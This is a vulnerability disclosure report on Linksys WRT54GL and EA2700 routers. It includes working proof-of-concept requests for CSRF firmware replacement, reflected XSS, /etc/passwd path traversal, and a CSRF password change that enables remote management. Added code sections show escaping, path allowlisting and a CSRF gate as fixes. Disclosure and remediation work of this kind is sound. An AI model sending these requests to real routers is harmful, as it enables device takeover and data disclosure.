# Linksys Router Vulnerabilities
I would like to report several vulnerabilities in Linksys network equipment. A public advisory regarding these issues may be released 30 days after sending this report. I'm more than happy to help you with testing or verifying these issues if you would like.
1. Linksys WRT54GL Firmware Upload CSRF Vulnerability
2. Linksys EA2700 XSS Vulnerability
3. Linksys EA2700 File Path Traversal Vulnerability
4. Linksys EA2700 Password Change Insufficient Authentication and CSRF Vulnerability
5. Linksys EA2700 Source Code Disclosure Vulnerability
## 1. Linksys WRT54GL Firmware Upload CSRF Vulnerability
### Vulnerable URL
http://192.168.1.1/upgrade.cgi
### Description
Lack of CSRF prevention on the upgrade firmware page could allow for a CSRF attack that replaces the router firmware.
### Proof of Concept
```html
<script>
function fileUpload(url, fileData, fileName) {
  var fileSize = fileData.length, boundary = "---------------------------168072824752491622650073", xhr = new XMLHttpRequest;
  xhr.open("POST", url, true);
  xhr.withCredentials = "true";
  xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=" + boundary);
  var body = boundary + "\r\n";
  body += "Content-Disposition: form-data; name=\"submit_button\"; name=\"submit_button\" \r\n\r\nUpgrade\r\n";
  body += boundary + "\r\nContent-Disposition: form-data; name=\"change_action\"\r\n\r\n\r\n";
  body += boundary + "\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\n\r\n";
  body += boundary + "\r\nContent-Disposition: form-data; name=\"file\"; filename=\"FW_WRT54GL_4.30.15.002_US_20101208_code.bin\"\r\n";
  body += "Content-Type: application/macbinary\r\n";
  body += "\r\n" + fileData + "\r\n\r\n";
  body += boundary + "\r\nConntent-Disposition: form-data; name=\"process\"\r\n\r\n\r\n";
  body += boundary + "--";
  if(navigator.userAgent.toLowerCase().indexOf("chrome") > -1) {
    XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
      function byteValue(x) {
        return x.charCodeAt(0) & 255
      }
      var ords = Array.prototype.map.call(datastr, byteValue);
      var ui8a = new Uint8Array(ords);
      this.send(ui8a.buffer)
    }
  }
  xhr.sendAsBinary(body);
  return true
}
fileUpload("http://192.167.0.1/upgrade.cgi", "W54G....", "myFile.gif");
</script>
```
## 2. Linksys EA2700 XSS Vulnerability
### Vulnerable URL
http://192.168.1.1/apply.cgi
### Vulnerable Parameter
submit_button
### Description
Lack of proper parameter value sanitization can result in reflected Cross-Site Scripting (XSS) on the apply.cgi page.
### Proof of Concept
REQUEST
```http
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

submit_button=xss'%3balert(1)//934&action=Apply
```
RESPONSE
```http
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Date: Wed, 29 Jun 2011 17:37:39 GMT
Server: lighttpd/1.4.28
Content-Length: 32467

<!--
// Utopia_Init: SUCCEEDED (rc = 1)
// Utopia_GetDeviceSettings: SUCCEEDED (rc = 0)
// DEVICE SETTINGS:
// hostname = Cisco11159
// lang = en-US
// tz gmt offset = -8.000000
// auto_dst = 1
// Utopia_GetDeviceInfo: SUCCEEDED (rc = 0)
// DEVICE INFO:
// firmware version = 1.0.12
// firmware revision = 128947
// firmware build date = 2012-02-18 07:57
// model name = EA2700
// current time = Wed Jun 29 10:37:39 2011
// wan_mac_address = 20:aa:4b:76:9c:5b
// wan_domainname =
//----------------------------------------------------------
// referrer page = xss';alert(1)//934.asp
// wait time = 0
// submit flag = 0
-->
<HTML dir="ltr">
<head>
<meta http-equiv="expires" content="0">
<meta http-equiv="cache-control" content="no-cache">
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<script type="text/javascript" charset="utf-8" src="/i18n/en_lang_pack.js"></script>
<SCRIPT language=JavaScript>
// *
// * Copyright (C) 2010, Cisco Systems, Inc.
// * All Rights Reserved.
// *
// * THIS SOFTWARE IS OFFERED "AS IS", AND CISCO GRANTS NO WARRANTIES OF ANY
// * KIND, EXPRESS OR IMPLIED, BY STATUTE, COMMUNICATION OR OTHERWISE. CISCO
// * SPECIFICALLY DISCLAIMS ANY IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS
// * FOR A SPECIFIC PURPOSE OR NONINFRINGEMENT CONCERNING THIS SOFTWARE.
// *
[..SNIP..]
<!-- Template error: Unable to open template file -->
<!-- Template error: Unable to open template file -->
<!-- Template error: Unable to open template file -->
var submit_button = 'xss';alert(1)//934.asp';
var wait_time = '0';
var continue_button = 1;
var t1 = new Date().getTime();
[..SNIP..]
```
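
The response above places the parameter inside a single-quoted JavaScript string, so the fix is encoding for that context rather than HTML escaping. The following is an added example, not firmware or vendor code; the function names are hypothetical.

```javascript
// Vulnerable pattern: raw concatenation into a single-quoted JS string,
// which is what the response above shows.
function renderVulnerable(submitButton) {
  return "var submit_button = '" + submitButton + ".asp';";
}

// Hardened: every character outside [A-Za-z0-9_] becomes a \uXXXX escape, so
// quotes, backslashes, "<", "/" and line terminators cannot end the string
// literal or the enclosing <script> element.
function jsStringEscape(value) {
  return String(value).replace(/[^A-Za-z0-9_]/g, (ch) =>
    "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0"));
}

function renderHardened(submitButton) {
  return "var submit_button = '" + jsStringEscape(submitButton) + ".asp';";
}

// Runs one rendered line with a stub alert() and reports the assigned value
// and how many times the stub was called.
function evaluate(line) {
  let alerts = 0;
  const run = new Function("alert", line + "\nreturn submit_button;");
  const value = run(() => { alerts += 1; });
  return { value, alerts };
}

// The parameter value from the request above, after URL decoding.
const reflected = "xss';alert(1)//934";
console.log(renderVulnerable(reflected), evaluate(renderVulnerable(reflected)));
console.log(renderHardened(reflected), evaluate(renderHardened(reflected)));
```

With the hardened renderer the whole input survives as data inside the string and the stub is never called.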
## 3. Linksys EA2700 File Path Traversal Vulnerability
### Vulnerable URL
http://192.168.1.1/apply.cgi
### Description
Inserting local system file paths in the "next_page" parameter results in the disclosure of files within the underlying filesystem.
### Proof of Concept
REQUEST
```http
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 75

submit_button=Wireless_Basic&change_action=gozila_cgi&next_page=/etc/passwd
```
RESPONSE
```http
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Date: Wed, 29 Jun 2011 17:50:20 GMT
Server: lighttpd/1.4.28
Content-Length: 1850

<!--
// Utopia_Init: SUCCEEDED (rc = 1)
// Utopia_GetDeviceSettings: SUCCEEDED (rc = 0)
// DEVICE SETTINGS:
// hostname = Cisco11159
// lang = en-US
// tz gmt offset = -8.000000
// auto_dst = 1
// Utopia_GetDeviceInfo: SUCCEEDED (rc = 0)
// DEVICE INFO:
// firmware version = 1.0.12
// firmware revision = 128947
// firmware build date = 2012-02-18 07:57
// model name = EA2700
// current time = Wed Jun 29 10:50:20 2011
// wan_mac_address = 20:aa:4b:76:9c:5b
// wan_domainname =
// Utopia_GetWifiRadioState[0]: SUCCEEDED (rc = 0)
// WIFI STATE (2.4 GHz): ENABLED
// Utopia_GetWifiRadioSettings[0]: SUCCEEDED (rc = 0)
// WIFI SETTINGS (2.4 GHz):
// interface = 0
// enabled = 1
// ssid broadcast = 1
// mac address = 20:aa:4b:76:9c:5c
// mode = 6
// band = 0
// channel = 0
// Utopia_GetWifiRadioState[1]: SUCCEEDED (rc = 0)
// WIFI STATE (5 GHz): ENABLED
// Utopia_GetWifiRadioSettings[1]: SUCCEEDED (rc = 0)
// WIFI SETTINGS (5 GHz):
// interface = 0
// enabled = 1
// ssid broadcast = 1
// mac address = 20:aa:4b:76:9c:5e
// mode = 7
// band = 0
// channel = 0
// Utopia_GetWifiSecuritySettings[0]: SUCCEEDED (rc = 0)
// wl0_sec_mode = 0
// wl0_key_renewal_interval = 0
// wl0_encrypt = 0
// Utopia_GetWifiSecuritySettings[1]: SUCCEEDED (rc = 0)
// wl1_sec_mode = 0
// wl1_key_renewal_interval = 0
// Utopia_GetWifiBridgeSettings: SUCCEEDED (rc = 0)
// WIFI BRIDGE SETTINGS:
// bridge mode = 0
// bridge ssid =
//----------------------------------------------------------
// referrer page = Wireless_Basic.asp
// wait time = 0
// submit flag = 0
-->
root:x:0:0::/:/bin/sh
nobody:x:99:99:Nobody:/:/bin/nologin
sshd:x:22:22::/var/empty:/sbin/nologin
admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh
quagga:x:1001:1001:Quagga:/var/empty:/bin/nologin
firewall:x:1002:1002:Firewall:/var/empty:/bin/nologin
```
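
A handler that treats "next_page" as a page name rather than a file path closes this disclosure. The following is an added example, not firmware code: the template root, the allowlist and both function names are assumptions, and the "vulnerable" function is only a model consistent with the response above.

```javascript
// Assumptions: TEMPLATE_ROOT and KNOWN_PAGES are illustrative; the two page
// names are the ones that appear in this advisory's requests.
const TEMPLATE_ROOT = "/www";
const KNOWN_PAGES = new Set(["Wireless_Basic.asp", "Management.asp"]);

// Model of the flawed behaviour: the parameter is used as a file path as-is,
// so an absolute path leaves the template directory.
function templatePathVulnerable(nextPage) {
  return nextPage.startsWith("/") ? nextPage : TEMPLATE_ROOT + "/" + nextPage;
}

// Hardened: the (already form-decoded) value must reduce to one allowlisted
// file name directly under TEMPLATE_ROOT; anything else yields null.
function templatePathHardened(nextPage) {
  const value = String(nextPage);
  if (/[\0\\%]/.test(value)) return null;      // NUL, backslash, leftover encoding
  const parts = [];
  for (const seg of value.split("/")) {
    if (seg === "" || seg === ".") continue;   // "//" and "./" add nothing
    if (seg === "..") return null;             // never walk upwards
    parts.push(seg);
  }
  if (parts.length !== 1) return null;         // templates sit directly in the root
  const name = parts[0].endsWith(".asp") ? parts[0] : parts[0] + ".asp";
  return KNOWN_PAGES.has(name) ? TEMPLATE_ROOT + "/" + name : null;
}

// Constructed inputs; "Wireless_Basic" and "/etc/passwd" appear in the request above.
const samples = ["Wireless_Basic", "/etc/passwd", "../../etc/passwd",
                 "Management.asp", "%2e%2e/etc/passwd"];
for (const s of samples) {
  console.log(s, "->", templatePathVulnerable(s), "|", templatePathHardened(s));
}
```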
## 4. Linksys EA2700 Password Change Insufficient Authentication and CSRF Vulnerability
### Vulnerable URL
http://192.168.1.1/upgrade.cgi
### Description
Lack of proper access controls on the router web administration interface allows attackers on the same network to make changes to the device without authentication. Attackers on the Internet can also take advantage of the lack of CSRF controls on the device to initiate a CSRF attack against users on the proper network in order to make changes to the device. Vulnerable settings include changing the device password, enabling remote management (WAN management), and toggling UPnP.
### Proof of Concept
CSRF to change the password and enable remote management

REQUEST
```http
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 370

submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&http_passwd=password&http_passwdConfirm=password&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&ctf_enable=1&upnp_enable=1&upnp_config=1&upnp_internet_dis=0
```
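
The checks missing from both CSRF findings (sections 1 and 4) can be expressed as one server-side gate that runs before any state-changing request is processed. The following is an added example, not firmware or vendor code; the session object, the host allowlist and the `csrf_token` and `current_passwd` fields are assumptions.

```javascript
// Assumptions: ALLOWED_HOSTS, the session object and the csrf_token and
// current_passwd fields are illustrative, not taken from the firmware.
const ALLOWED_HOSTS = new Set(["192.168.1.1"]);

// Compares every position so a token check does not stop at the first mismatch.
function safeEqual(a, b) {
  let diff = a.length ^ b.length;
  for (let i = 0; i < Math.max(a.length, b.length); i++) {
    diff |= (a.charCodeAt(i) || 0) ^ (b.charCodeAt(i) || 0);
  }
  return diff === 0;
}

function hostOf(url) {
  try { return new URL(url).host; } catch (e) { return null; }
}

// Returns "ok", or the reason a state-changing request is refused.
function gateStateChange(req, session) {
  if (!session || !session.authenticated) return "unauthenticated";
  if (req.method !== "POST") return "method";
  // Pinning Host to the device's own addresses also blunts DNS rebinding.
  if (!ALLOWED_HOSTS.has(req.headers.host)) return "host";
  const source = req.headers.origin || req.headers.referer;
  if (!source || !ALLOWED_HOSTS.has(hostOf(source))) return "cross-origin";
  if (!safeEqual(String(req.form.csrf_token || ""), session.csrfToken)) return "csrf-token";
  // A password change additionally needs proof of the current password.
  if (req.form.PasswdModify === "1" &&
      !session.verifyPassword(String(req.form.current_passwd || ""))) {
    return "current-password";
  }
  return "ok";
}

// Constructed samples: the form fields mirror the request shown above.
const session = { authenticated: true, csrfToken: "c0nstructed-token",
                  verifyPassword: (p) => p === "old-password" };
const form = { submit_button: "Management", action: "Apply", PasswdModify: "1",
               http_passwd: "password", remote_management: "1" };
const forged = { method: "POST", form,
                 headers: { host: "192.168.1.1", origin: "http://attacker.example" } };
const genuine = { method: "POST",
                  form: { ...form, csrf_token: "c0nstructed-token", current_passwd: "old-password" },
                  headers: { host: "192.168.1.1", origin: "http://192.168.1.1" } };

console.log(gateStateChange(forged, null));     // no session at all
console.log(gateStateChange(forged, session));  // victim's browser, foreign origin
console.log(gateStateChange(genuine, session)); // request from the admin UI itself
```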
## 5. Linksys Router Source Code Disclosure Vulnerability
### Vulnerable URL
http://192.168.1.1/Management.asp/
### Description
By adding a slash ("/") to the end of the URL path, the router returns the raw source code of the page.

Source link: https://superevr.com/blog/2013/dont-use-linksys-routers/

The information contained within this publication is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts responsibility for any damage caused by the use or misuse of this information.